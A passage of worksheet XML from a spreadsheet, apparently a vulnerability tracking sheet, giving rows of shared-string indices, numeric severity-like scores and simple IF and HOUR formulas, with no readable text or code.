        <v>25</v>
      </c>
      <c r="J243" s="4"/>
      <c r="K243" s="4"/>
      <c r="L243" s="4">
        <f>IF(out!$G243="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M243" s="4"/>
      <c r="N243" s="4"/>
      <c r="O243" s="13"/>
      <c r="P243" s="4"/>
      <c r="Q243" s="13">
        <f>HOUR(out!$P243 -out!$N243)</f>
        <v>0</v>
      </c>
      <c r="R243" s="18"/>
      <c r="S243" s="4"/>
      <c r="T243" s="4"/>
      <c r="U243" s="4"/>
      <c r="V243" s="7"/>
    </row>
    <row r="244" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A244" s="3" t="s">
        <v>1577</v>
      </c>
      <c r="B244" s="4" t="s">
        <v>1578</v>
      </c>
      <c r="C244" s="4" t="s">
        <v>1579</v>
      </c>
      <c r="D244" s="4" t="s">
        <v>1580</v>
      </c>
      <c r="E244" s="4" t="s">
        <v>1581</v>
      </c>
      <c r="F244" s="4" t="s">
        <v>1507</v>
      </c>
      <c r="G244" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H244" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I244" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J244" s="4"/>
      <c r="K244" s="4"/>
      <c r="L244" s="4">
        <f>IF(out!$G244="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M244" s="4"/>
      <c r="N244" s="4"/>
      <c r="O244" s="13"/>
      <c r="P244" s="4"/>
      <c r="Q244" s="13">
        <f>HOUR(out!$P244 -out!$N244)</f>
        <v>0</v>
      </c>
      <c r="R244" s="18"/>
      <c r="S244" s="4"/>
      <c r="T244" s="4"/>
      <c r="U244" s="4"/>
      <c r="V244" s="7"/>
    </row>
    <row r="245" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A245" s="3" t="s">
        <v>1524</v>
      </c>
      <c r="B245" s="4" t="s">
        <v>1582</v>
      </c>
      <c r="C245" s="4" t="s">
        <v>1583</v>
      </c>
      <c r="D245" s="4" t="s">
        <v>1584</v>
      </c>
      <c r="E245" s="4" t="s">
        <v>1585</v>
      </c>
      <c r="F245" s="4" t="s">
        <v>1586</v>
      </c>
      <c r="G245" s="4" t="s">
        <v>702</v>
      </c>
      <c r="H245" s="4">
        <v>8.4</v>
      </c>
      <c r="I245" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J245" s="4"/>
      <c r="K245" s="4"/>
      <c r="L245" s="4">
        <f>IF(out!$G245="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M245" s="4"/>
      <c r="N245" s="4"/>
      <c r="O245" s="13"/>
      <c r="P245" s="4"/>
      <c r="Q245" s="13">
        <f>HOUR(out!$P245 -out!$N245)</f>
        <v>0</v>
      </c>
      <c r="R245" s="18"/>
      <c r="S245" s="4"/>
      <c r="T245" s="4"/>
      <c r="U245" s="4"/>
      <c r="V245" s="7"/>
    </row>
    <row r="246" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A246" s="3" t="s">
        <v>1587</v>
      </c>
      <c r="B246" s="4" t="s">
        <v>1588</v>
      </c>
      <c r="C246" s="4" t="s">
        <v>1589</v>
      </c>
      <c r="D246" s="4" t="s">
        <v>1590</v>
      </c>
      <c r="E246" s="4" t="s">
        <v>1591</v>
      </c>
      <c r="F246" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G246" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H246" s="4">
        <v>7.5</v>
      </c>
      <c r="I246" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J246" s="4"/>
      <c r="K246" s="4"/>
      <c r="L246" s="4">
        <f>IF(out!$G246="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M246" s="4"/>
      <c r="N246" s="4"/>
      <c r="O246" s="13"/>
      <c r="P246" s="4"/>
      <c r="Q246" s="13">
        <f>HOUR(out!$P246 -out!$N246)</f>
        <v>0</v>
      </c>
      <c r="R246" s="18"/>
      <c r="S246" s="4"/>
      <c r="T246" s="4"/>
      <c r="U246" s="4"/>
      <c r="V246" s="7"/>
    </row>
    <row r="247" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A247" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B247" s="4" t="s">
        <v>1592</v>
      </c>
      <c r="C247" s="4" t="s">
        <v>1593</v>
      </c>
      <c r="D247" s="4" t="s">
        <v>1594</v>
      </c>
      <c r="E247" s="4" t="s">
        <v>1595</v>
      </c>
      <c r="F247" s="4" t="s">
        <v>1596</v>
      </c>
      <c r="G247" s="4" t="s">
        <v>550</v>
      </c>
      <c r="H247" s="4">
        <v>7.5</v>
      </c>
      <c r="I247" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J247" s="4"/>
      <c r="K247" s="4"/>
      <c r="L247" s="4">
        <f>IF(out!$G247="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M247" s="4"/>
      <c r="N247" s="4"/>
      <c r="O247" s="13"/>
      <c r="P247" s="4"/>
      <c r="Q247" s="13">
        <f>HOUR(out!$P247 -out!$N247)</f>
        <v>0</v>
      </c>
      <c r="R247" s="18"/>
      <c r="S247" s="4"/>
      <c r="T247" s="4"/>
      <c r="U247" s="4"/>
      <c r="V247" s="7"/>
    </row>
    <row r="248" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A248" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B248" s="4" t="s">
        <v>1597</v>
      </c>
      <c r="C248" s="4" t="s">
        <v>1598</v>
      </c>
      <c r="D248" s="4" t="s">
        <v>1599</v>
      </c>
      <c r="E248" s="4" t="s">
        <v>1600</v>
      </c>
      <c r="F248" s="4" t="s">
        <v>1601</v>
      </c>
      <c r="G248" s="4" t="s">
        <v>1602</v>
      </c>
      <c r="H248" s="4">
        <v>7.5</v>
      </c>
      <c r="I248" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J248" s="4"/>
      <c r="K248" s="4"/>
      <c r="L248" s="4">
        <f>IF(out!$G248="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M248" s="4"/>
      <c r="N248" s="4"/>
      <c r="O248" s="13"/>
      <c r="P248" s="4"/>
      <c r="Q248" s="13">
        <f>HOUR(out!$P248 -out!$N248)</f>
        <v>0</v>
      </c>
      <c r="R248" s="18"/>
      <c r="S248" s="4"/>
      <c r="T248" s="4"/>
      <c r="U248" s="4"/>
      <c r="V248" s="7"/>
    </row>
    <row r="249" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A249" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B249" s="4" t="s">
        <v>1603</v>
      </c>
      <c r="C249" s="4" t="s">
        <v>1604</v>
      </c>
      <c r="D249" s="4" t="s">
        <v>1605</v>
      </c>
      <c r="E249" s="4" t="s">
        <v>1606</v>
      </c>
      <c r="F249" s="4" t="s">
        <v>1607</v>
      </c>
      <c r="G249" s="4" t="s">
        <v>1608</v>
      </c>
      <c r="H249" s="4">
        <v>7.5</v>
      </c>
      <c r="I249" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J249" s="4"/>
      <c r="K249" s="4"/>
      <c r="L249" s="4">
        <f>IF(out!$G249="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M249" s="4"/>
      <c r="N249" s="4"/>
      <c r="O249" s="13"/>
      <c r="P249" s="4"/>
      <c r="Q249" s="13">
        <f>HOUR(out!$P249 -out!$N249)</f>
        <v>0</v>
      </c>
      <c r="R249" s="18"/>
      <c r="S249" s="4"/>
      <c r="T249" s="4"/>
      <c r="U249" s="4"/>
      <c r="V249" s="7"/>
    </row>
    <row r="250" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A250" s="3" t="s">
        <v>844</v>
      </c>
      <c r="B250" s="4" t="s">
        <v>1609</v>
      </c>
      <c r="C250" s="4" t="s">
        <v>1610</v>
      </c>
      <c r="D250" s="4" t="s">
        <v>1611</v>
      </c>
      <c r="E250" s="4" t="s">
        <v>1612</v>
      </c>
      <c r="F250" s="4" t="s">
        <v>1613</v>
      </c>
      <c r="G250" s="4" t="s">
        <v>1614</v>
      </c>
      <c r="H250" s="4">
        <v>8.3000000000000007</v>
      </c>
      <c r="I250" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J250" s="4"/>
      <c r="K250" s="4"/>
      <c r="L250" s="4">
        <f>IF(out!$G250="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M250" s="4"/>
      <c r="N250" s="4"/>
      <c r="O250" s="13"/>
      <c r="P250" s="4"/>
      <c r="Q250" s="13">
        <f>HOUR(out!$P250 -out!$N250)</f>
        <v>0</v>
      </c>
      <c r="R250" s="18"/>
      <c r="S250" s="4"/>
      <c r="T250" s="4"/>
      <c r="U250" s="4"/>
      <c r="V250" s="7"/>
    </row>
    <row r="251" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A251" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B251" s="4" t="s">
        <v>1616</v>
      </c>
      <c r="C251" s="4" t="s">
        <v>1617</v>
      </c>
      <c r="D251" s="4" t="s">
        <v>1618</v>
      </c>
      <c r="E251" s="4" t="s">
        <v>1619</v>
      </c>
      <c r="F251" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G251" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H251" s="4">
        <v>6.3</v>
      </c>
      <c r="I251" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J251" s="4"/>
      <c r="K251" s="4"/>
      <c r="L251" s="4">
        <f>IF(out!$G251="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M251" s="4"/>
      <c r="N251" s="4"/>
      <c r="O251" s="13"/>
      <c r="P251" s="4"/>
      <c r="Q251" s="13">
        <f>HOUR(out!$P251 -out!$N251)</f>
        <v>0</v>
      </c>
      <c r="R251" s="18"/>
      <c r="S251" s="4"/>
      <c r="T251" s="4"/>
      <c r="U251" s="4"/>
      <c r="V251" s="7"/>
    </row>
    <row r="252" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A252" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B252" s="4" t="s">
        <v>1620</v>
      </c>
      <c r="C252" s="4" t="s">
        <v>1621</v>
      </c>
      <c r="D252" s="4" t="s">
        <v>1622</v>
      </c>
      <c r="E252" s="4" t="s">
        <v>1623</v>
      </c>
      <c r="F252" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G252" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H252" s="4">
        <v>6.3</v>
      </c>
      <c r="I252" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J252" s="4"/>
      <c r="K252" s="4"/>
      <c r="L252" s="4">
        <f>IF(out!$G252="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M252" s="4"/>
      <c r="N252" s="4"/>
      <c r="O252" s="13"/>
      <c r="P252" s="4"/>
      <c r="Q252" s="13">
        <f>HOUR(out!$P252 -out!$N252)</f>
        <v>0</v>
      </c>
      <c r="R252" s="18"/>
      <c r="S252" s="4"/>
      <c r="T252" s="4"/>
      <c r="U252" s="4"/>
      <c r="V252" s="7"/>
    </row>
    <row r="253" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A253" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B253" s="4" t="s">
        <v>1624</v>
      </c>
      <c r="C253" s="4" t="s">
        <v>1625</v>
      </c>
      <c r="D253" s="4" t="s">
        <v>1626</v>
      </c>
      <c r="E253" s="4" t="s">
        <v>1627</v>
      </c>
      <c r="F253" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G253" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H253" s="4">
        <v>6.3</v>
      </c>
      <c r="I253" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J253" s="4"/>
      <c r="K253" s="4"/>
      <c r="L253" s="4">
        <f>IF(out!$G253="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M253" s="4"/>
      <c r="N253" s="4"/>
      <c r="O253" s="13"/>
      <c r="P253" s="4"/>
      <c r="Q253" s="13">
        <f>HOUR(out!$P253 -out!$N253)</f>
        <v>0</v>
      </c>
      <c r="R253" s="18"/>
      <c r="S253" s="4"/>
      <c r="T253" s="4"/>
      <c r="U253" s="4"/>
      <c r="V253" s="7"/>
    </row>
    <row r="254" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A254" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B254" s="4" t="s">
        <v>1628</v>
      </c>
      <c r="C254" s="4" t="s">
        <v>1629</v>
      </c>
      <c r="D254" s="4" t="s">
        <v>1630</v>
      </c>
      <c r="E254" s="4" t="s">
        <v>1631</v>
      </c>
      <c r="F254" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G254" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H254" s="4">
        <v>6.3</v>
      </c>
      <c r="I254" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J254" s="4"/>
      <c r="K254" s="4"/>
      <c r="L254" s="4">
        <f>IF(out!$G254="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M254" s="4"/>
      <c r="N254" s="4"/>
      <c r="O254" s="13"/>
      <c r="P254" s="4"/>
      <c r="Q254" s="13">
        <f>HOUR(out!$P254 -out!$N254)</f>
        <v>0</v>
      </c>
      <c r="R254" s="18"/>
      <c r="S254" s="4"/>
      <c r="T254" s="4"/>
      <c r="U254" s="4"/>
      <c r="V254" s="7"/>
    </row>
    <row r="255" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A255" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B255" s="4" t="s">
        <v>1632</v>
      </c>
      <c r="C255" s="4" t="s">
        <v>1633</v>
      </c>
      <c r="D255" s="4" t="s">
        <v>1634</v>
      </c>
      <c r="E255" s="4" t="s">
        <v>1635</v>
      </c>
      <c r="F255" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G255" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H255" s="4">
        <v>6.3</v>
      </c>
      <c r="I255" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J255" s="4"/>
      <c r="K255" s="4"/>
      <c r="L255" s="4">
        <f>IF(out!$G255="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M255" s="4"/>
      <c r="N255" s="4"/>
      <c r="O255" s="13"/>
      <c r="P255" s="4"/>
      <c r="Q255" s="13">
        <f>HOUR(out!$P255 -out!$N255)</f>
        <v>0</v>
      </c>
      <c r="R255" s="18"/>
      <c r="S255" s="4"/>
      <c r="T255" s="4"/>
      <c r="U255" s="4"/>
      <c r="V255" s="7"/>
    </row>
    <row r="256" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A256" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B256" s="4" t="s">
        <v>1636</v>
      </c>
      <c r="C256" s="4" t="s">
        <v>1637</v>
      </c>
      <c r="D256" s="4" t="s">
        <v>1638</v>
      </c>
      <c r="E256" s="4" t="s">
        <v>1639</v>
      </c>
      <c r="F256" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G256" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H256" s="4">
        <v>6.3</v>
      </c>
      <c r="I256" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J256" s="4"/>
      <c r="K256" s="4"/>
      <c r="L256" s="4">
        <f>IF(out!$G256="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M256" s="4"/>
      <c r="N256" s="4"/>
      <c r="O256" s="13"/>
      <c r="P256" s="4"/>
      <c r="Q256" s="13">
        <f>HOUR(out!$P256 -out!$N256)</f>
        <v>0</v>
      </c>
      <c r="R256" s="18"/>
      <c r="S256" s="4"/>
      <c r="T256" s="4"/>
      <c r="U256" s="4"/>
      <c r="V256" s="7"/>
    </row>
    <row r="257" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A257" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B257" s="4" t="s">
        <v>1640</v>
      </c>
      <c r="C257" s="4" t="s">
        <v>1641</v>
      </c>
      <c r="D257" s="4" t="s">
        <v>1642</v>
      </c>
      <c r="E257" s="4" t="s">
        <v>1643</v>
      </c>
      <c r="F257" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G257" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H257" s="4">
        <v>6.3</v>
      </c>
      <c r="I257" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J257" s="4"/>
      <c r="K257" s="4"/>
      <c r="L257" s="4">
        <f>IF(out!$G257="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M257" s="4"/>
      <c r="N257" s="4"/>
      <c r="O257" s="13"/>
      <c r="P257" s="4"/>
      <c r="Q257" s="13">
        <f>HOUR(out!$P257 -out!$N257)</f>
        <v>0</v>
      </c>
      <c r="R257" s="18"/>
      <c r="S257" s="4"/>
      <c r="T257" s="4"/>
      <c r="U257" s="4"/>
      <c r="V257" s="7"/>
    </row>
    <row r="258" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A258" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B258" s="4" t="s">
        <v>1644</v>
      </c>
      <c r="C258" s="4" t="s">
        <v>1645</v>
      </c>
      <c r="D258" s="4" t="s">
        <v>1646</v>
      </c>
      <c r="E258" s="4" t="s">
        <v>1647</v>
      </c>
      <c r="F258" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G258" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H258" s="4">
        <v>6.3</v>
      </c>
      <c r="I258" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J258" s="4"/>
      <c r="K258" s="4"/>
      <c r="L258" s="4">
        <f>IF(out!$G258="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M258" s="4"/>
      <c r="N258" s="4"/>
      <c r="O258" s="13"/>
      <c r="P258" s="4"/>
      <c r="Q258" s="13">
        <f>HOUR(out!$P258 -out!$N258)</f>
        <v>0</v>
      </c>
      <c r="R258" s="18"/>
      <c r="S258" s="4"/>
      <c r="T258" s="4"/>
      <c r="U258" s="4"/>
      <c r="V258" s="7"/>
    </row>
    <row r="259" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A259" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B259" s="4" t="s">
        <v>1648</v>
      </c>
      <c r="C259" s="4" t="s">
        <v>1649</v>
      </c>
      <c r="D259" s="4" t="s">
        <v>1650</v>
      </c>
      <c r="E259" s="4" t="s">
        <v>1651</v>
      </c>
      <c r="F259" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G259" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H259" s="4">
        <v>6.3</v>
      </c>
      <c r="I259" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J259" s="4"/>
      <c r="K259" s="4"/>
      <c r="L259" s="4">
        <f>IF(out!$G259="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M259" s="4"/>
      <c r="N259" s="4"/>
      <c r="O259" s="13"/>
      <c r="P259" s="4"/>
      <c r="Q259" s="13">
        <f>HOUR(out!$P259 -out!$N259)</f>
        <v>0</v>
      </c>
      <c r="R259" s="18"/>
      <c r="S259" s="4"/>
      <c r="T259" s="4"/>
      <c r="U259" s="4"/>
      <c r="V259" s="7"/>
    </row>
    <row r="260" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A260" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B260" s="4" t="s">
        <v>1652</v>
      </c>
      <c r="C260" s="4" t="s">
        <v>1653</v>
      </c>
      <c r="D260" s="4" t="s">
        <v>1654</v>
      </c>
      <c r="E260" s="4" t="s">
        <v>1655</v>
      </c>
      <c r="F260" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G260" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H260" s="4">
        <v>6.3</v>
      </c>
      <c r="I260" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J260" s="4"/>
      <c r="K260" s="4"/>
      <c r="L260" s="4">
        <f>IF(out!$G260="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M260" s="4"/>
      <c r="N260" s="4"/>
      <c r="O260" s="13"/>
      <c r="P260" s="4"/>
      <c r="Q260" s="13">
        <f>HOUR(out!$P260 -out!$N260)</f>
        <v>0</v>
      </c>
      <c r="R260" s="18"/>
      <c r="S260" s="4"/>
      <c r="T260" s="4"/>
      <c r="U260" s="4"/>
      <c r="V260" s="7"/>
    </row>
    <row r="261" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A261" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B261" s="4" t="s">
        <v>1656</v>
      </c>
      <c r="C261" s="4" t="s">
        <v>1657</v>
      </c>
      <c r="D261" s="4" t="s">
        <v>1658</v>
      </c>
      <c r="E261" s="4" t="s">
        <v>1659</v>
      </c>
      <c r="F261" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G261" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H261" s="4">
        <v>6.3</v>
      </c>
      <c r="I261" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J261" s="4"/>
      <c r="K261" s="4"/>
      <c r="L261" s="4">
        <f>IF(out!$G261="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M261" s="4"/>
      <c r="N261" s="4"/>
      <c r="O261" s="13"/>
      <c r="P261" s="4"/>
      <c r="Q261" s="13">
        <f>HOUR(out!$P261 -out!$N261)</f>
        <v>0</v>
      </c>
      <c r="R261" s="18"/>
      <c r="S261" s="4"/>
      <c r="T261" s="4"/>
      <c r="U261" s="4"/>
      <c r="V261" s="7"/>
    </row>
    <row r="262" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A262" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B262" s="4" t="s">
        <v>1660</v>
      </c>
      <c r="C262" s="4" t="s">
        <v>1661</v>
      </c>
      <c r="D262" s="4" t="s">
        <v>1662</v>
      </c>
      <c r="E262" s="4" t="s">
        <v>1663</v>
      </c>
      <c r="F262" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G262" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H262" s="4">
        <v>6.3</v>
      </c>
      <c r="I262" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J262" s="4"/>
      <c r="K262" s="4"/>
      <c r="L262" s="4">
        <f>IF(out!$G262="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M262" s="4"/>
      <c r="N262" s="4"/>
      <c r="O262" s="13"/>
      <c r="P262" s="4"/>
      <c r="Q262" s="13">
        <f>HOUR(out!$P262 -out!$N262)</f>
        <v>0</v>
      </c>
      <c r="R262" s="18"/>
      <c r="S262" s="4"/>
      <c r="T262" s="4"/>
      <c r="U262" s="4"/>
      <c r="V262" s="7"/>
    </row>
    <row r="263" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A263" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B263" s="4" t="s">
        <v>1664</v>
      </c>
      <c r="C263" s="4" t="s">
        <v>1665</v>
      </c>
      <c r="D263" s="4" t="s">
        <v>1666</v>
      </c>
      <c r="E263" s="4" t="s">
        <v>1667</v>
      </c>
      <c r="F263" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G263" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H263" s="4">
        <v>6.3</v>
      </c>
      <c r="I263" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J263" s="4"/>
      <c r="K263" s="4"/>
      <c r="L263" s="4">
        <f>IF(out!$G263="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M263" s="4"/>
      <c r="N263" s="4"/>
      <c r="O263" s="13"/>
      <c r="P263" s="4"/>
      <c r="Q263" s="13">
        <f>HOUR(out!$P263 -out!$N263)</f>
        <v>0</v>
      </c>
      <c r="R263" s="18"/>
      <c r="S263" s="4"/>
      <c r="T263" s="4"/>
      <c r="U263" s="4"/>
      <c r="V263" s="7"/>
    </row>
    <row r="264" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A264" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B264" s="4" t="s">
        <v>1668</v>
      </c>
      <c r="C264" s="4" t="s">
        <v>1669</v>
      </c>
      <c r="D264" s="4" t="s">
        <v>1670</v>
      </c>
      <c r="E264" s="4" t="s">
        <v>1671</v>
      </c>
      <c r="F264" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G264" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H264" s="4">
        <v>6.3</v>
      </c>
      <c r="I264" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J264" s="4"/>
      <c r="K264" s="4"/>
      <c r="L264" s="4">
        <f>IF(out!$G264="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M264" s="4"/>
      <c r="N264" s="4"/>
      <c r="O264" s="13"/>
      <c r="P264" s="4"/>
      <c r="Q264" s="13">
        <f>HOUR(out!$P264 -out!$N264)</f>
        <v>0</v>
      </c>
      <c r="R264" s="18"/>
      <c r="S264" s="4"/>
      <c r="T264" s="4"/>
      <c r="U264" s="4"/>
      <c r="V264" s="7"/>
    </row>
    <row r="265" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A265" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B265" s="4" t="s">
        <v>1672</v>
      </c>
      <c r="C265" s="4" t="s">
        <v>1673</v>
      </c>
      <c r="D265" s="4" t="s">
        <v>1674</v>
      </c>
      <c r="E265" s="4" t="s">
        <v>1675</v>
      </c>
      <c r="F265" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G265" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H265" s="4">
        <v>6.3</v>
      </c>
      <c r="I265" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J265" s="4"/>
      <c r="K265" s="4"/>
      <c r="L265" s="4">
        <f>IF(out!$G265="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M265" s="4"/>
      <c r="N265" s="4"/>
      <c r="O265" s="13"/>
      <c r="P265" s="4"/>
      <c r="Q265" s="13">
        <f>HOUR(out!$P265 -out!$N265)</f>
        <v>0</v>
      </c>
      <c r="R265" s="18"/>
      <c r="S265" s="4"/>
      <c r="T265" s="4"/>
      <c r="U265" s="4"/>
      <c r="V265" s="7"/>
    </row>
    <row r="266" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A266" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B266" s="4" t="s">
        <v>1676</v>
      </c>
      <c r="C266" s="4" t="s">
        <v>1677</v>
      </c>
      <c r="D266" s="4" t="s">
        <v>1678</v>
      </c>
      <c r="E266" s="4" t="s">
        <v>1679</v>
      </c>
      <c r="F266" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G266" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H266" s="4">
        <v>6.3</v>
      </c>
      <c r="I266" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J266" s="4"/>
      <c r="K266" s="4"/>
      <c r="L266" s="4">
        <f>IF(out!$G266="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M266" s="4"/>
      <c r="N266" s="4"/>
      <c r="O266" s="13"/>
      <c r="P266" s="4"/>
      <c r="Q266" s="13">
        <f>HOUR(out!$P266 -out!$N266)</f>
        <v>0</v>
      </c>
      <c r="R266" s="18"/>
      <c r="S266" s="4"/>
      <c r="T266" s="4"/>
      <c r="U266" s="4"/>
      <c r="V266" s="7"/>
    </row>
    <row r="267" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A267" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B267" s="4" t="s">
        <v>1680</v>
      </c>
      <c r="C267" s="4" t="s">
        <v>1681</v>
      </c>
      <c r="D267" s="4" t="s">
        <v>1682</v>
      </c>
      <c r="E267" s="4" t="s">
        <v>1683</v>
      </c>
      <c r="F267" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G267" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H267" s="4">
        <v>6.3</v>
      </c>
      <c r="I267" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J267" s="4"/>
      <c r="K267" s="4"/>
      <c r="L267" s="4">
        <f>IF(out!$G267="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M267" s="4"/>
      <c r="N267" s="4"/>
      <c r="O267" s="13"/>
      <c r="P267" s="4"/>
      <c r="Q267" s="13">
        <f>HOUR(out!$P267 -out!$N267)</f>
        <v>0</v>
      </c>
      <c r="R267" s="18"/>
      <c r="S267" s="4"/>
      <c r="T267" s="4"/>
      <c r="U267" s="4"/>
      <c r="V267" s="7"/>
    </row>
    <row r="268" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A268" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="B268" s="4" t="s">
        <v>1684</v>
      </c>
      <c r="C268" s="4" t="s">
        <v>1685</v>
      </c>
      <c r="D268" s="4" t="s">
        <v>1686</v>
      </c>
      <c r="E268" s="4" t="s">
        <v>1687</v>
      </c>
      <c r="F268" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G268" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H268" s="4">
        <v>6.3</v>
      </c>
      <c r="I268" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J268" s="4"/>
